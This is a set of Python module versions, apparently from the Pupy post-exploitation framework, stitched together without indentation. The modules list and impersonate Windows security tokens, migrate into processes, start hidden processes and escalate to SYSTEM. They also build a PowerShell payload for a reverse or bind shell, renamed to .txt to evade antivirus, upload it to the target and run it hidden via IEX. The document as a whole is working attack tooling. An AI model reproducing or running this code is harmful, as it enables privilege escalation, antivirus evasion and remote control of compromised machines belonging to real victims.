def run(self, args):
if args.list:
#with redirected_stdo(self.client.conn):
l = obtain(
self.client.conn.modules["pupwinutils.security"].ListSids())
#self.log('\n'.join(["%s : %s"%x for x in l]))
self.rawlog(
self.formatter.table_format(
[{
"pid": x[0],
"process": x[1],
"sid": x[2],
"username": x[3]
} for x in l],
wl=["pid", "process", "username", "sid"]))
elif args.impersonate:
if args.migrate:
proc_pid = self.client.conn.modules[
"pupwinutils.security"].create_proc_as_sid(
args.impersonate)
migrate(self, proc_pid)
else:
self.client.impersonated_dupHandle = self.client.conn.modules[
"pupwinutils.security"].impersonate_sid_long_handle(
args.impersonate, close=False)
self.success("Sid %s impersonated !" % args.impersonate)
elif args.rev2self:
self.client.conn.modules["pupwinutils.security"].rev2self()
self.client.impersonated_dupHandle = None
self.success("rev2self called")
else:
self.error("no option supplied")
def run(self, args):
if args.list:
ListSids = self.client.remote('pupwinutils.security', 'ListSids')
sids = ListSids()
process_table = []
sids_table = []
sids_dict = {}
for (pid, process, sid, username) in sids:
process_table.append({
'pid': pid,
'process': process,
'sid': sid,
'username': username
})
sids_dict[sid] = username
for sid, username in sids_dict.iteritems():
sids_table.append({
'sid': sid,
'username': username
})
self.log(MultiPart([
Table(process_table, [
'pid', 'process', 'username', 'sid'
], caption='Process table'),
Table(sids_table, [
'sid', 'username'
], caption='Available Sids')
]))
elif args.impersonate:
if args.migrate:
create_proc_as_sid = self.client.remote('pupwinutils.security', 'create_proc_as_sid', False)
proc_pid = create_proc_as_sid(args.impersonate)
migrate(self, proc_pid, keep=True)
else:
impersonate_sid_long_handle = self.client.remote(
'pupwinutils.security', 'impersonate_sid_long_handle', False)
self.client.impersonated_dupHandle = impersonate_sid_long_handle(args.impersonate, close=False)
self.success('Sid {} impersonated !'.format(args.impersonate))
elif args.rev2self:
rev2self = self.client.remote('pupwinutils.security', 'rev2self', False)
rev2self()
self.client.impersonated_dupHandle = None
self.success('rev2self called')
else:
self.error('no option supplied')
def run(self, args):
pid=None
if args.create:
p=self.client.conn.modules['pupwinutils.processes'].start_hidden_process(args.create)
pid=p.pid
self.success("%s created with pid %s"%(args.create,pid))
else:
pid=args.pid
migrate(self, pid, args.keep)
def run(self, args):
pid = None
if args.create:
p = self.client.conn.modules[
'pupwinutils.processes'].start_hidden_process(args.create)
pid = p.pid
self.success("%s created with pid %s" % (args.create, pid))
else:
pid = args.pid
migrate(self, pid, args.keep)
def run(self, args):
if args.list:
#with redirected_stdo(self.client.conn):
l=obtain(self.client.conn.modules["pupwinutils.security"].ListSids())
#self.log('\n'.join(["%s : %s"%x for x in l]))
self.rawlog(self.formatter.table_format([{"pid": x[0], "process":x[1], "sid" : x[2], "username":x[3]} for x in l], wl=["pid", "process", "username", "sid"]))
elif args.impersonate:
if args.migrate:
proc_pid=self.client.conn.modules["pupwinutils.security"].create_proc_as_sid(args.impersonate)
migrate(self, proc_pid, keep=True)
else:
self.client.impersonated_dupHandle=self.client.conn.modules["pupwinutils.security"].impersonate_sid_long_handle(args.impersonate, close=False)
self.success("Sid %s impersonated !"%args.impersonate)
elif args.rev2self:
self.client.conn.modules["pupwinutils.security"].rev2self()
self.client.impersonated_dupHandle=None
self.success("rev2self called")
else:
self.error("no option supplied")
def run(self, args):
if args.list:
ListSids = self.client.remote('pupwinutils.security', 'ListSids')
sids = ListSids()
self.table([{
'pid': x[0],
'process': x[1],
'sid': x[2],
'username': x[3]
} for x in sids],
wl=['pid', 'process', 'username', 'sid'])
elif args.impersonate:
if args.migrate:
create_proc_as_sid = self.client.remote(
'pupwinutils.security', 'create_proc_as_sid', False)
proc_pid = create_proc_as_sid(args.impersonate)
migrate(self, proc_pid, keep=True)
else:
impersonate_sid_long_handle = self.client.remote(
'pupwinutils.security', 'impersonate_sid_long_handle',
False)
self.client.impersonated_dupHandle = impersonate_sid_long_handle(
args.impersonate, close=False)
self.success('Sid {} impersonated !'.format(args.impersonate))
elif args.rev2self:
rev2self = self.client.remote('pupwinutils.security', 'rev2self',
False)
rev2self()
self.client.impersonated_dupHandle = None
self.success('rev2self called')
else:
self.error('no option supplied')
def run(self, args):
with redirected_stdo(self.client.conn):
proc_pid=self.client.conn.modules["pupwinutils.security"].getsystem()
migrate(self, proc_pid)
self.success("got system !")
def run(self, args):
with redirected_stdo(self.client.conn):
proc_pid = self.client.conn.modules[
"pupwinutils.getsystem"].getsystem()
migrate(self, proc_pid)
self.success("got system !")
def run(self, args):
# Command to execute on the target
cmdToExecute = None
# The the local file which contains PS1 script (when powershell chosen or enabled automcatically)
local_file = ''
# True if ps1 script will be used in bind mode. If reverse connection with ps1 then False
isBindLauncherForPs1 = False
# Contains ip:port used for bind connection on the target with ps1 script.
# None if reverse connection and (consequently) isBindLauncherForPs1==False
listeningAddressPortForBindPs1 = None
# Usefull information for bind mode connection (ps1 script)
launcherType, addressPort = self.client.desc[
'launcher'], self.client.desc['address']
completion = None
# Case of a pupy bind shell if ps1 mode is used (no reverse connection possible)
if launcherType == "bind":
self.info(
'The current pupy launcher is using a BIND connection. It is listening on {0} on the target'
.format(addressPort))
isBindLauncherForPs1 = True
self.info(
'Consequently, powershell option is enabled automatically')
args.powershell = True
else:
self.info(
'The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)'
)
isBindLauncherForPs1 = False
# A Powershell payload is used for getting a pupy session as SYSTEM
if args.powershell:
self.info(
'A powershell payload will be used for getting a pupy session as SYSTEM'
)
clientConfToUse = None
if isBindLauncherForPs1:
self.info(
'Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}'
.format(addressPort))
self.info(
"Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port"
)
self.info(
"Be careful, you have to choose a port which is not used on the target!"
)
listeningPort = -1
while listeningPort == -1:
try:
listeningPort = int(
input(
"[?] Give me the listening port to use on the target: "
))
except Exception as e:
self.warning(
"You have to give me a valid port. Try again. ({})"
.format(e))
listeningAddress = addressPort.split(':')[0]
listeningAddressPortForBindPs1 = "{0}:{1}".format(
listeningAddress, listeningPort)
self.info(
"The ps1 script used for getting a pupy session as SYSTEM will be configured for listening on {0} on the target"
.format(listeningAddressPortForBindPs1))
bindConf = self.client.get_conf()
#Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target
bindConf['launcher_args'][
bindConf['launcher_args'].index("--port") +
1] = str(listeningPort)
clientConfToUse = bindConf
else:
self.info(
'Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection'
)
clientConfToUse = self.client.get_conf()
cmdToExecute, completion = powerloader.serve(self, clientConfToUse)
# restart current exe as system
if args.restart:
self.info(
'Trying to configure for running the current executable on the target as SYSTEM'
)
exe = self.client.desc['exec_path'].split('\\')
if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe'
] and exe[1].lower() == 'windows':
self.warning('It seems that your current process is %s' %
self.client.desc['exec_path'])
self.warning('It is not recommended to restart it')
return
cmdToExecute = self.client.desc['exec_path']
if args.method == 'inheritance':
if not cmdToExecute:
cmdToExecute = args.execute
if cmdToExecute is None:
self.error(
'Application to execute with SYSTEM privileges should '
'be specified with one of -x/-p/-r args')
return
try:
enable_privilege = self.client.remote('pupwinutils.security',
'EnablePrivilege', False)
enable_privilege('SeDebugPrivilege')
self.success('{} enabled'.format('SeDebugPrivilege'))
except Exception as e:
self.error('{} was not enabled: {}'.format(
'SeDebugPrivilege', e.args[1]))
create_new_process_from_ppid = self.client.remote(
'pupwinutils.security', 'create_new_process_from_ppid', False)
if args.parentID:
self.info(
'Using the Parent Process method on the pid {0}...'.format(
args.parentID))
self.info('Command: {}'.format(cmdToExecute))
pid = create_new_process_from_ppid(int(args.parentID),
cmdToExecute)
self.success('Created: pid={}, ppid={}'.format(
pid, args.parentID))
return
else:
self.info(
"Getting information about all processes running on the target"
)
enum_processes = self.client.remote('pupwinutils.processes',
'enum_processes')
get_integrity_level = self.client.remote(
'pupwinutils.security', 'get_integrity_level', False)
self.info(
"Searching a process with a 'SYSTEM' integrity level")
for aprocess in enum_processes():
integrityLevel = get_integrity_level(aprocess['pid'])
if not integrityLevel == 'System':
continue
self.info(
"{0} (pid {1}) has a 'SYSTEM' integrity level, trying to use it"
.format(aprocess['name'], aprocess['pid']))
try:
pid = create_new_process_from_ppid(
aprocess['pid'], cmdToExecute)
self.success('Created: pid={}, ppid={}'.format(
pid, aprocess['pid']))
break
except Exception as e:
self.error('Failed: {}'.format(' '.join(
x for x in e.args if type(x) is str)))
elif args.method == 'impersonate':
if cmdToExecute is None:
cmdToExecute = args.execute or 'cmd.exe'
getsystem = self.client.remote('pupwinutils.security', 'getsystem',
False)
proc_pid = getsystem(cmdToExecute)
self.success('Impersonated, pid={}. Migrating..'.format(proc_pid))
migrate(self, proc_pid, keep=args.keep, timeout=args.timeout)
return
if args.powershell:
if completion and not completion.is_set():
self.info('Waiting for PowerLoader completion')
completion.wait()
if isBindLauncherForPs1:
self.success(
'You have to connect to the target manually on {0}: '
'try "connect --host {0}" in pupy shell'.format(
listeningAddressPortForBindPs1))
else:
self.success(
'Waiting for a connection (take few seconds, 1 min max)...'
)
if local_file:
os.remove(local_file)
def run(self, args):
local_file = ''
# restart current exe as system
if args.restart:
self.info('Using current executable')
exe = self.client.desc['exec_path'].split('\\')
if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe'
] and exe[1].lower() == 'windows':
self.warning('It seems that your current process is %s' %
self.client.desc['exec_path'])
self.warning('It is not recommended to restart it')
return
cmd = self.client.desc['exec_path']
# use powerhell to get a reverse shell
elif args.powershell:
ros = self.client.conn.modules['os']
rtempfile = self.client.conn.modules['tempfile']
tempdir = rtempfile.gettempdir()
random_name = ''.join([
random.choice(string.ascii_letters + string.digits)
for n in xrange(6)
])
remotefile = ''
self.info('Using powershell payload')
if '64' in self.client.desc['os_arch']:
local_file = pupygen.generate_ps1(self.client.get_conf(),
x64=True)
else:
local_file = pupygen.generate_ps1(self.client.get_conf(),
x86=True)
# change the ps1 to txt file to avoid AV detection
random_name += '.txt'
remotefile = ros.path.join(tempdir, random_name)
cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe'
param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile
cmd = '%s %s' % (cmd, param)
self.info("Uploading file in %s" % remotefile)
upload(self.client.conn, local_file, remotefile)
# migrate
else:
cmd = args.prog
with redirected_stdo(self):
proc_pid = self.client.conn.modules[
"pupwinutils.security"].getsystem(prog=cmd)
if args.migrate and not args.restart and not args.powershell:
migrate(self, proc_pid)
self.success("got system !")
else:
self.success(
"Waiting for a connection (take few seconds, 1 min max)...")
if args.powershell:
os.remove(local_file)
def run(self, args):
local_file = ''
#True if ps1 script will be used in bind mode. If reverse connection with ps1 then False
isBindLauncherForPs1 = False
#Contains ip:port used for bind connection on the target with ps1 script. None if reverse connection and (consequently) isBindLauncherForPs1==False
listeningAddressPortForBindPs1 = None
#Usefull information for bind mode connection (ps1 script)
launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address']
#Case of a pupy bind shell if ps1 mode is used (no reverse connection possible)
if launcherType == "bind":
self.info('The current pupy launcher is using a BIND connection. It is listening on {0} on the target'.format(addressPort))
isBindLauncherForPs1 = True
self.info('Consequently, powershell option is enabled')
args.powershell = True
else:
self.info('The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)')
isBindLauncherForPs1 = False
# restart current exe as system
if args.restart:
self.info('Using current executable')
exe = self.client.desc['exec_path'].split('\\')
if exe[len(exe)-1].lower() in ['powershell.exe', 'cmd.exe'] and exe[1].lower() == 'windows':
self.warning('It seems that your current process is %s' % self.client.desc['exec_path'])
self.warning('It is not recommended to restart it')
return
cmd = self.client.desc['exec_path']
# use powerhell to get a reverse shell
elif args.powershell or isBindLauncherForPs1:
clientConfToUse = None
ros = self.client.conn.modules['os']
rtempfile = self.client.conn.modules['tempfile']
tempdir = rtempfile.gettempdir()
random_name = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(6)])
remotefile = ''
if isBindLauncherForPs1:
self.info('Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}'.format(addressPort))
self.info("Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port")
self.info("Be careful, you have to choose a port which is not used on the target!")
listeningPort = -1
while listeningPort==-1:
try:
listeningPort = int(input("[?] Give me the listening port to use on the target: "))
except Exception as e:
self.warning("You have to give me a valid port. Try again. ({})".format(e))
listeningAddress = addressPort.split(':')[0]
listeningAddressPortForBindPs1 = "{0}:{1}".format(listeningAddress, listeningPort)
self.info("The ps1 script used for get a System pupy shell will be configured for listening on {0} on the target".format(listeningAddressPortForBindPs1))
bindConf = self.client.get_conf()
#Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target
bindConf['launcher_args'][bindConf['launcher_args'].index("--port")+1] = str(listeningPort)
clientConfToUse = bindConf
else:
self.info('Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection')
clientConfToUse = self.client.get_conf()
if '64' in self.client.desc['proc_arch']:
local_file = pupygen.generate_ps1(clientConfToUse, x64=True)
else:
local_file = pupygen.generate_ps1(clientConfToUse, x86=True)
# change the ps1 to txt file to avoid AV detection
random_name += '.txt'
remotefile = ros.path.join(tempdir, random_name)
cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe'
param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile
cmd = '%s %s' % (cmd, param)
self.info("Uploading file in %s" % remotefile)
upload(self.client.conn, local_file, remotefile)
# migrate
else:
cmd = args.prog
with redirected_stdo(self):
proc_pid = self.client.conn.modules["pupwinutils.security"].getsystem(prog=cmd)
if args.migrate and not args.restart and not args.powershell:
migrate(self, proc_pid, keep=args.keep, timeout=args.timeout)
self.success("got system !")
else:
if isBindLauncherForPs1 == True:
self.success("You have to connect to the target manually on {0}: try 'connect --host {0}' in pupy shell".format(listeningAddressPortForBindPs1))
else:
self.success("Waiting for a connection (take few seconds, 1 min max)...")
if args.powershell:
os.remove(local_file)